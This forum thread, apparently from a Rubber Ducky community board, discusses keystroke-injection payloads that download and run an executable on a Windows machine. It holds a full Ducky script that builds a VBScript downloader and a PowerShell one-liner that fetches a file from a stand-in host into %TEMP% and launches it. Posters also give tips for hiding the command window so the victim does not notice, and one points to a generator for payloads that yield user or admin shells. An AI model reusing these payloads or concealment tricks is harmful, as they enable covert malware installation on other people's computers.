crashie Posted March 6, 2013 Share Posted March 6, 2013 (edited) Hi, I'm new to the ducky, just got it today :P I am trying to get it to download an executable file from a http and then execute it. Have seen the payload called "Ducky Downloader" and it works, but not in the background, instead the CMD pops up and is visible during the whole time until it's finished doing what it should do, download and execute. Isn't there a way to do this in the background so that it doesn't get noticed? Thanks in advance!/ Crashie Btw, this is the script I'm talking about: ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs <INSERT URL HERE> ENTER STRING <INSERT EXE FILENAME HERE> ENTER STRING exit ENTER Edited March 6, 2013 by midnitesnake formatting Quote Link to comment Share on other sites More sharing options...
no42 Posted March 6, 2013 Share Posted March 6, 2013 (edited) The problem is, the ducky relies on HID injection (keyboard injection), so it needs the focus of current windows to operate correctly (just like macros), as soon as your window-focus changes, the payload will cease to function correctly, as the payload will be split between 2+ windows. The advantage is the Ducky types really fast, so just alt-f4 to close the window once the payload is complete, and hopefully no-one will be the wiser (or their distracted or AFK) and completely miss the command prompt. Alternatively - use the twin-duck firmware to execute directly from the sdcard! Save's from downloading (time/bandwidth), or even a valid http connection ;) Edited March 6, 2013 by midnitesnake Quote Link to comment Share on other sites More sharing options...
crashie Posted March 6, 2013 Author Share Posted March 6, 2013 Hi and thanks for your response! So, whatever I do with the rubber ducky it will always be shown on the actual computer? And there is no way to hide the windows? I tried the RunEXE script (and have installed twin duck firmware (the special version 1 that runs the payload when CAPS is pressed) but when I did that it just opened up hell of a lot of windows and the registry and some programs and did not execute my file.. So I don't know what went wrong there.. Appreciate any help given. And sorry for being such a newbie :P But one have to start somewhere ;) /crashie The problem is, the ducky relies on HID injection (keyboard injection), so it needs the focus of current windows to operate correctly (just like macros), as soon as your window-focus changes, the payload will cease to function correctly, as the payload will be split between 2+ windows. The advantage is the Ducky types really fast, so just alt-f4 to close the window once the payload is complete, and hopefully no-one will be the wiser (or their distracted or AFK) and completely miss the command prompt. Alternatively - use the twin-duck firmware to execute directly from the sdcard! Save's from downloading (time/bandwidth), or even a valid http connection ;) Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted March 7, 2013 Share Posted March 7, 2013 i posted a large payload somewhere with different possibilities on how to hide it.. were only one worked for me xD i don't remember it though.. but i guess i did it by entering the move command promt option and then just very fast insert some down keys to hide it beneath your screen while it does the rest. Quote Link to comment Share on other sites More sharing options...
overwraith Posted March 7, 2013 Share Posted March 7, 2013 There are ways to hide the command prompt below the bottom or side of the screen. With the new duckscript compiler, the "REPEAT" command is now included, and here's a link to the hide CMD window payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window More recently I combined window hiding action with someones powershell wget and execute: REM Target: WINDOWS VISTA/7 REM Encoder V2.4 REM Using the run command for a broader OS base. DELAY 3000 GUI R DELAY 1000 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER Quote Link to comment Share on other sites More sharing options...
skysploit Posted March 11, 2013 Share Posted March 11, 2013 You can download the simple-ducky payload generator. It has two different versions of the download and execute payload built in. One will yield you a User priv shell and the other an Admin priv shell. Here's the link; https://code.google.com/p/simple-ducky-payload-generator/ ~skysploit Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.